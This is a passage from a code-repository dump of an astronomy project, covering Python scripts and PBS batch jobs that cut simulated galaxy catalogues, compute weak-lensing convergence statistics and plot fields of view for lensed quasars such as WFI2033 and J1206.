0.01 * sample[8],0.01 + 0.01 * sample[9],0.01 + 0.01 * sample[10],0.01 + 0.01 * sample[11],0.01 + 0.01 * sample[12],0.01 + 0.01 * sample[13],0.01 + 0.01 * sample[14],0.01 + 0.01 * sample[15],0.01 + 0.01 * sample[16],0.01 + 0.01 * sample[17],0.01 + 0.01 * sample[18],0.01 + 0.01 * sample[19]]) # because 0.01 is the redshift step\n else:\n samplez[nr] = np.array([phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec]])\n if nr != 0:\n lephdata = np.c_[lephdata,phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k]]\n else:\n lephdata = np.c_[phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k]]\n nr = nr + 1\n\n samplez = samplez.reshape(samplez.size)\n print np.shape(lephdata)\n lephdata = np.r_[lephdata,samplez.reshape(1,samplez.size)]\n\n data = np.copy(lephdata)\n lephare(data,file[:-4] + \"_eazysample.cat\",True)\n data = np.copy(lephdata)\n lephare(data,file[:-4] + \"_noIRACeazysample.cat\",False)\n data = np.copy(lephdata)\n lephare_noobs(data,file[:-4] + \"_eazysample_noobs.cat\",True)\n data = np.copy(lephdata)\n lephare_noobs(data,file[:-4] + \"_noIRACeazysample_noobs.cat\",False)\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "3621058ae92ddd814ebea107701cf8e9903d1cb2", "content_id": "edc1fef75c0680d34db3cd225d52b170623996e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium1.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.6697080135345459, "alphanum_fraction": 0.7682482004165649, "avg_line_length": 26.399999618530273, "blob_id": "ce39e1df2e157ede0adda2f2d6758f4abb92deb9", "content_id": "487fe61d1b53d295fce55389d50e606cd1f27738", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 548, "license_type": "no_license", "max_line_length": 78, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim7.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log7s.out\n#PBS -e Log7s.err\n#PBS -N 7s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass3\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass3\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass3\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass3\n" }, { "alpha_fraction": 0.6329479813575745, "alphanum_fraction": 0.7196531891822815, "avg_line_length": 19.41176414489746, "blob_id": "a63d6916c7d84487e2f58cb82aea82fd24c31aeb", "content_id": "232c72deea4600e6568ab7363917cadd4e1d38c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 346, "license_type": "no_license", "max_line_length": 125, "num_lines": 17, "path": "/python/scripts/NAOJ/batch_infersim5new.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n##PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Log5.out\n#PBS -e Log5.err\n#PBS -N 5\n#PBS -l mem=30gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython inferkappa_unbiasedwithshearJ1206withHE0435.py J1206 -1.0 -1.0 removegrouphandpicked fiducial 5 120 24 meds gal zoverr" }, { "alpha_fraction": 0.5722627639770508, "alphanum_fraction": 0.6270073056221008, "avg_line_length": 30.136363983154297, "blob_id": "4c0b706547b718f5ee4d6337754ef9e20a9b0fcf", "content_id": "a265c12d6233df46461bd0469f2cb8edb78b3d64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1370, "license_type": "no_license", "max_line_length": 253, "num_lines": 44, "path": "/python/plot_utilities/plot_MstarMhaloMS.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# produces density plot for the MS catalogue Mhalo vs catalogue Mstar\n\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\n\nfont = 10\nticksize = 10\n\nplt.clf()\nfig = plt.figure(figsize=(10,12))\n#fig, axes = plt.subplots(nrows=2, ncols=2)\n\nax1 = fig.add_subplot(1,1,1)\n#ax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images_forNAOJ.txt\" % (i,j,k), usecols=(4, 5), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 15\noutlim = 0.15\nx = np.log10(x)\ny = np.log10(y)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\ncolorbar()\ndelta = (y-x)/(1+x)\nplt.xlabel('Mhalo', fontsize=font)\nplt.ylabel('Mstar', fontsize=font)\nplt.xlim(8, 16)\nplt.ylim(5, 12)\nplt.savefig('/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/MstarMhaloMS.png' , dpi=250)\n" }, { "alpha_fraction": 0.7289628386497498, "alphanum_fraction": 0.7632094025611877, "avg_line_length": 39.880001068115234, "blob_id": "345dc1269101e730ab69e3fff61d8ee69b4972b2", "content_id": "5865170303e8536c02f15fd1084c7a71ab275d39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1022, "license_type": "no_license", "max_line_length": 109, "num_lines": 25, "path": "/python/image_utilities/align.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Subpixel cross-correlation alignment from http://image-registration.readthedocs.io/en/latest/#quick-example\n\nfrom astropy.io import fits\nfrom image_registration import chi2_shift\nfrom image_registration.fft_tools import shift\n\nimage0 = fits.open('VISTAmatch_Ks_small.fits')\ndata0 = image0[0].data\n\n# repeat this block for each image\nimage1 = fits.open('VISTAmatch_J_small.fits')\ndata1 = image1[0].data\nxoff, yoff, exoff, eyoff = chi2_shift(data0, data1,err=None,return_error=True,upsample_factor='auto')\ndata1_corr = shift.shiftnd(data1, (-yoff, -xoff))\nimage1_corr = image1\nimage1_corr[0].data = data1_corr\nimage1_corr.writeto('VISTAmatch_J_small_shift.fits',overwrite=True)\n\nimage1 = fits.open('VISTAmatch_Y_small.fits')\ndata1 = image1[0].data\nxoff, yoff, exoff, eyoff = chi2_shift(data0, data1,err=None,return_error=True,upsample_factor='auto')\ndata1_corr = shift.shiftnd(data1, (-yoff, -xoff))\nimage1_corr = image1\nimage1_corr[0].data = data1_corr\nimage1_corr.writeto('VISTAmatch_Y_small_shift.fits',overwrite=True)\n" }, { "alpha_fraction": 0.4545004963874817, "alphanum_fraction": 0.507171094417572, "avg_line_length": 51.51948165893555, "blob_id": "8aca1e13817c992231b09924d11a543b226bc238", "content_id": "e2d31e88610fba9ac7436b0196e28015495f1bf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4044, "license_type": "no_license", "max_line_length": 237, "num_lines": 77, "path": "/python/catalogue_utilities/SAMcutnosampling.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Selects desired fields from the SAM galaxy catalogues and implements cuts\n\nimport numpy as np\n\n#sam = \"SA\"\nsam = \"Henriques\"\nz_s = 2.375 # DES0408\nlim_i = 22.5\n\nif sam == \"SA\":\n dirin = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/\"\n dirout = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/SA_gal_i225_redshift2375/\"\n for i in range(8):\n for j in range(8):\n for k in range(4):\n for l in range(4):\n print i, j, k, l\n input = dirin + \"GGL_los_8_%s_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt\" %(i,j,k,l)\n output = dirout + \"SA_gal_i225_redshift2375_8_%s_%s_%s_%s_N_4096_ang_4.images.txt\" %(i,j,k,l)\n zspec = 5\n pos0 = 6\n pos1 = 7\n mag_g = 13\n mag_r = 14\n mag_i = 15\n mag_z = 16\n data = np.loadtxt(input,comments=\"GalID\",usecols=[zspec,pos0,pos1,mag_g,mag_r,mag_i,mag_z],unpack=True)\n zspec = 0\n pos0 = 1\n pos1 = 2\n mag_g = 3\n mag_r = 4\n mag_i = 5\n mag_z = 6\n dataout1 = data[zspec][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout2 = data[pos0][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout3 = data[pos1][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout4 = data[mag_g][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout5 = data[mag_r][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout6 = data[mag_i][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout7 = data[mag_z][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n np.savetxt(output,np.c_[dataout1,dataout2,dataout3,dataout4,dataout5,dataout6,dataout7],fmt='%1.2f %1.7f %1.7f %1.2f %1.2f %1.2f %1.2f', header = 'z_spec pos_0[rad] pos_1[rad] mag_SDSS_g mag_SDSS_r mag_SDSS_i mag_SDSS_z')\n\nif sam == \"Henriques\":\n import class_Henriques2014 # this is class_Henriques2014.py\n dirin = \"/lfs08/rusucs/0408/completegalcat/\"\n dirout = \"/lfs08/rusucs/0408/completegalcat/Henriques_gal_i225_redshift2375/\"\n for i in range(8):\n for j in range(8):\n print i, j\n pl = np.linspace(27,63,63 - 27 + 1) # plane 27 redshift 3.06\n out = np.empty(5)\n for k in range(len(pl)):\n #print int(pl[k])\n with open(\"%sGGL_los_8_%d_%d_N_4096_ang_4_Henriques2014_galaxies_on_plane_%d_f.images\" % (dirin,i,j,pl[k]), mode = 'rb') as file:\n lower_bound = np.fromfile(file, 'f8', 2)\n upper_bound = np.fromfile(file, 'f8', 2)\n plane_angle, = np.fromfile(file, 'f8', 1)\n redshift, = np.fromfile(file, 'f8', 1)\n n_galaxies, = np.fromfile(file, 'i8', 1)\n n_cells = np.fromfile(file, 'i4', 2)\n gal_struct = class_Henriques2014.Henriques2014()\n galaxy = np.fromfile(file, gal_struct.galaxy_struct, n_galaxies)\n\n id = galaxy['galaxy_id']\n z = galaxy['redshift']\n pos0 = galaxy['position'][:,0]\n pos1 = galaxy['position'][:,1]\n imag = galaxy['mag'][:,gal_struct.filter_number_for_i_band_trans]\n gal = np.c_[id,z,pos0,pos1,imag].T\n ind_z = 1\n ind_imag = 4\n gal = np.delete(gal,np.where(gal[ind_z] > z_s),axis=1)\n gal = np.delete(gal,np.where(gal[ind_imag] > lim_i),axis=1)\n gal = np.delete(gal,np.where(gal[ind_imag] < 0),axis=1) # because there are some -inf in 8_7_7 and 8_3_7\n out = np.c_[out,gal]\n np.savetxt(\"%sGGL_los_8_%d_%d_N_4096_ang_4_Henriques2014_galaxies.txt\" % (dirout,i,j),out.T,fmt='%d %1.7f %1.7f %1.7f %1.2f', header = 'galaxy_id redshift\tpos_0\tpos_1\ti')\n" }, { "alpha_fraction": 0.5784465670585632, "alphanum_fraction": 0.6014605164527893, "avg_line_length": 32.97744369506836, "blob_id": "37275e26d6c6e36dfe7d76892dee1df163196187", "content_id": "6b963d6714008257b6cb04e9564bd878542394a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4519, "license_type": "no_license", "max_line_length": 148, "num_lines": 133, "path": "/python/plot_utilities/kappa_medsig.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots the equivalent of Figure 13 in Rusu et al. 2017\n\n#import matplotlib\n#matplotlib.use('Agg')\n#import matplotlib.pyplot as plt\n#import scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport os\nimport glob\n\nmin_kappa = -0.10\nmax_kappa = 1\n#min_kappa_plot = -0.05\n#max_kappa_plot = 0.2\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\nlist = glob.glob(root+'kappahist*.cat')\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n sum = np.sum(kappa_all_)\n #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n #std = np.sqrt(meanX2 - meanX**2)\n\n med = 0\n i = 0\n ok = False\n while (med <= sum/2.0) and (ok == False):\n med = med + kappa_all_[i]\n if med > sum/2.0:\n median = kappa_values[i] + halfwidth\n ok = True\n if med == sum/2.0:\n median = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum * 0.16) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum * 0.16:\n std1_ = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.16:\n std1_ = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum*0.84) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum*0.84:\n std1 = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.84:\n std1 = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n stddev = (std1 - std1_) / 2\n\n return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n \"\"\"smooth the data using a window with requested size.\n\n This method is based on the convolution of a scaled window with the signal.\n The signal is prepared by introducing reflected copies of the signal\n (with the window size) in both ends so that transient parts are minimized\n in the begining and end part of the output signal.\n\n input:\n x: the input signal\n window_len: the dimension of the smoothing window; should be an odd integer\n window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n flat window will produce a moving average smoothing.\n\n output: the smoothed signal\n\n see also:\n\n numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n scipy.signal.lfilter\n\n TODO: the window parameter could be the window itself if an array instead of a string\n NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError, \"smooth only accepts 1 dimension arrays.\"\n if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n raise ValueError, \"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\"\n if x.size < window_len:\n raise ValueError, \"Input vector needs to be bigger than window size.\"\n\n if window_len<3:\n return x\n s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n if window == 'flat': #moving average\n w=np.ones(window_len,'d')\n else:\n w=eval('np.'+window+'(window_len)')\n y=np.convolve(w/w.sum(),s,mode='valid')\n return y\n\nfout = root + 'medstd.dat'\n#file =open('fout','a')\nos.system('rm -f %s' % fout)\n\nfor i in range(len(list)):\n file = list[i]\n kappa = np.loadtxt(file, usecols=[0], unpack=True, comments = '#')\n median,stddev,kappa_values = statistics(kappa,bin_stat,min_kappa,max_kappa)\n winlen = 12\n #smooth(kappa_3,winlen,'flat')\n #smooth(kappa_3,winlen,'hanning')\n #smooth(kappa_3,winlen,'hamming')\n #smooth(kappa_3,winlen,'bartlett')\n #smooth(kappa_3,winlen,'blackman')\n median_smooth,stddev_smooth,kappa_values_smooth = statistics(smooth(kappa,winlen,'flat')[(winlen/2-1):-(winlen/2)],bin_stat,min_kappa,max_kappa)\n str = \"%s %.3f %.3f %.3f %.3f \\n\" % (list[i],median,stddev,median_smooth,stddev_smooth)\n fileout = open(fout,'a')\n fileout.write(str)\nfileout.close()\n" }, { "alpha_fraction": 0.5911999940872192, "alphanum_fraction": 0.623199999332428, "avg_line_length": 28.761905670166016, "blob_id": "b1f1a7021162f5f75c874e58babdb56d87838072", "content_id": "c7b21efc79bee33fc2741e5ce50bca37b6f8a191", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1250, "license_type": "no_license", "max_line_length": 133, "num_lines": 42, "path": "/python/plot_utilities/fluxratio.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple plot with custom labels\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.clf()\n\ndata = np.loadtxt('fluxratio.cat', dtype={'names': ('filter', 'A/B', 'A/C', 'A/D', 'B/C'),'formats': ('S2', 'f4', 'f4', 'f4', 'f4')})\nfilt = [x[0] for x in data]\nb = [x[1] for x in data]\nc = [x[2] for x in data]\nd = [x[3] for x in data]\nbc = [x[4] for x in data]\n\nx=np.linspace(1,len(filt),len(filt))\nplt.xticks(x, filt)\nplt.plot(x, b, label=data.dtype.names[1])\nplt.plot(x, c, label=data.dtype.names[2])\nplt.plot(x, d, label=data.dtype.names[3])\nplt.plot(x, bc, label=data.dtype.names[4])\nplt.legend()\n\nplt.savefig('fluxratio.eps', dpi=150, bbox_inches='tight')\n\nplt.clf()\n\ndata = np.loadtxt('fluxratio.cat', dtype={'names': ('filter', 'B/A', 'C/A', 'D/A', 'C/B'),'formats': ('S2', 'f4', 'f4', 'f4', 'f4')})\nfilt = [x[0] for x in data]\nb = [1/x[1] for x in data]\nc = [1/x[2] for x in data]\nd = [1/x[3] for x in data]\nbc = [1/x[4] for x in data]\n\nx=np.linspace(1,len(filt),len(filt))\nplt.xticks(x, filt)\nplt.plot(x, b, label=data.dtype.names[1])\nplt.plot(x, c, label=data.dtype.names[2])\nplt.plot(x, d, label=data.dtype.names[3])\nplt.plot(x, bc, label=data.dtype.names[4])\nplt.legend()\n\nplt.savefig('fluxratioinverse.eps', dpi=150, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6097464561462402, "alphanum_fraction": 0.665213942527771, "avg_line_length": 59.095237731933594, "blob_id": "d256f49462cb6c92af521c644c754c17ed4d9d22", "content_id": "4ea97b542f9363647a0789ab2bb412caec10b134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5048, "license_type": "no_license", "max_line_length": 186, "num_lines": 84, "path": "/python/plot_utilities/fov.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# creates FOV figure from Birrer et al. 2018\n\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.clf()\npix = 1283 # number of pixels in 4 arcmin\nscale = 240.0 / pix\nmaglim1 = 24\nmaglim2 = 23\nz_l = 1.789\nx,y,i,photoz,spec,classify = np.loadtxt(\"catalogues/i24at2sigma_iunconv_igrKconv_detectin_iunconv_corrisoautoerredit_short_withbpzlephareclass.cat\",usecols=[0,1,10,30,42,49],unpack=True)\nsep = np.sqrt((x - pix/2.0)**2 + (y - pix/2.0)**2) * scale\nredshift = np.copy(photoz)\nredshift[spec >= 0] = spec[spec >= 0]\n\nspec = spec[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nphotoz = photoz[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nx = x[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\ny = y[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nclassify = classify[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nsep_ = sep[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\ni_ = i[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nredshift = redshift[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nsep = sep_\ni = i_\n\nx_spec_bright = x[((classify == 0) | (classify == 1)) & (i <= maglim2)]\ny_spec_bright = y[((classify == 0) | (classify == 1)) & (i <= maglim2)]\nx_spec_faint = x[((classify == 0) | (classify == 1)) & (i > maglim2)]\ny_spec_faint = y[((classify == 0) | (classify == 1)) & (i > maglim2)]\nspec_bright = spec[((classify == 0) | (classify == 1)) & (i <= maglim2)]\nspec_faint = spec[((classify == 0) | (classify == 1)) & (i > maglim2)]\nredshift_spec_bright = redshift[((classify == 0) | (classify == 1)) & (i <= maglim2)]\nredshift_spec_faint = redshift[((classify == 0) | (classify == 1)) & (i > maglim2)]\n\nx_group_bright = x_spec_bright[(spec_bright > 0.736) & (spec_bright <= 0.756)]\ny_group_bright = y_spec_bright[(spec_bright > 0.736) & (spec_bright <= 0.756)]\nx_group_faint = x_spec_faint[(spec_faint > 0.736) & (spec_faint <= 0.756)]\ny_group_faint = y_spec_faint[(spec_faint > 0.736) & (spec_faint <= 0.756)]\nredshift_group_bright = redshift_spec_bright[(spec_bright > 0.736) & (spec_bright <= 0.756)]\nredshift_group_faint = redshift_spec_faint[(spec_faint > 0.736) & (spec_faint <= 0.756)]\n\nx_star_bright = x[(classify < 0) & (i <= maglim2)]\ny_star_bright = y[(classify < 0) & (i <= maglim2)]\nx_star_faint = x[(classify < 0) & (i > maglim2)]\ny_star_faint = y[(classify < 0) & (i > maglim2)]\nredshift_star_bright = redshift[(classify < 0) & (i <= maglim2)]\nredshift_star_faint = redshift[(classify < 0) & (i > maglim2)]\n\nx_galnospec_bright = x[(classify == 2) & (i <= maglim2)]\ny_galnospec_bright = y[(classify == 2) & (i <= maglim2)]\nx_galnospec_faint = x[(classify == 2) & (i > maglim2)]\ny_galnospec_faint = y[(classify == 2) & (i > maglim2)]\nredshift_galnospec_bright = redshift[(classify == 2) & (i <= maglim2)]\nredshift_galnospec_faint = redshift[(classify == 2) & (i > maglim2)]\n\nimage = fits.getdata(\"images/J1206_GMOSi_CFHTLSscale_weighted_bkg96_masked.fits\")\nimage[image<0] = 0.0001\nzmax = 0.1*round(10*np.max(redshift)) + 0.1\n\nmask = fits.getdata(\"catalogues/mskforplot.fits\")\n\nplt.scatter(x_star_bright,y_star_bright,marker='*',edgecolors='none',s=30,linewidths=1,c=redshift_star_bright,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_star_faint,y_star_faint,marker='*',edgecolors='none',s=10,linewidths=1,c=redshift_star_faint,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_galnospec_bright,y_galnospec_bright,marker='o',edgecolors='none',s=30,linewidths=1,c=redshift_galnospec_bright,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_galnospec_faint,y_galnospec_faint,marker='o',edgecolors='none',s=10,linewidths=1,c=redshift_galnospec_faint,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_spec_bright,y_spec_bright,marker='s',edgecolors='none',linewidths=1,s=30,c=redshift_spec_bright,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_spec_faint,y_spec_faint,marker='s',edgecolors='none',linewidths=1,s=10,c=redshift_spec_faint,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_group_bright,y_group_bright,marker='s',edgecolors='k',linewidths=1,s=30,c=redshift_group_bright,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_group_faint,y_group_faint,marker='s',edgecolors='k',linewidths=1,s=10,c=redshift_group_faint,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.colorbar(format='%.1f')#,boundaries=[0,1.8])\nplt.imshow(image, cmap='gray_r', norm=LogNorm(), origin='lower', vmin=0.001, vmax=100)\nplt.imshow(mask, cmap='Oranges', origin='lower', alpha=0.2)\ncircle1 = plt.Circle((pix/2.0,pix/2.0),45/120.0*pix/2.0,color='k',fill=False)\ncircle2 = plt.Circle((pix/2.0,pix/2.0),pix/2.0,color='k',fill=False)\nfig = plt.gcf()\nfig.gca().add_artist(circle1)\nfig.gca().add_artist(circle2)\nfig = plt.gca()\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig('FOV_J1206.png', dpi=300, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5873417854309082, "alphanum_fraction": 0.7426160573959351, "avg_line_length": 48.375, "blob_id": "87c6d1904c37ebbfc2a3326df7cda047694b7b6d", "content_id": "4e330477fc4e9e6c07be57bab346ff87f833cfa5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1185, "license_type": "no_license", "max_line_length": 119, "num_lines": 24, "path": "/python/scripts/NAOJ/batch0_insertstars_.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb0_.out\n#PBS -e Logb0_.err\n#PBS -N 0_\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\n" }, { "alpha_fraction": 0.5497599244117737, "alphanum_fraction": 0.6145787835121155, "avg_line_length": 52.27906799316406, "blob_id": "a569de3f0ca079163fa6b99d6faec73c939f36d6", "content_id": "56f9427f62ef1deeaebabae2b30d06935d63b26f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4582, "license_type": "no_license", "max_line_length": 377, "num_lines": 86, "path": "/python/catalogue_utilities/plotkappabarall_WFI2033 copy.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. Make sure the uncomment the appropriate ax.set_ylim, ylabel and savefig lines\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/eduardrusu/Dropbox/Davis_work/code/GOODCODE/WFI2033kappa/\"\n\n#kappastat_45 = 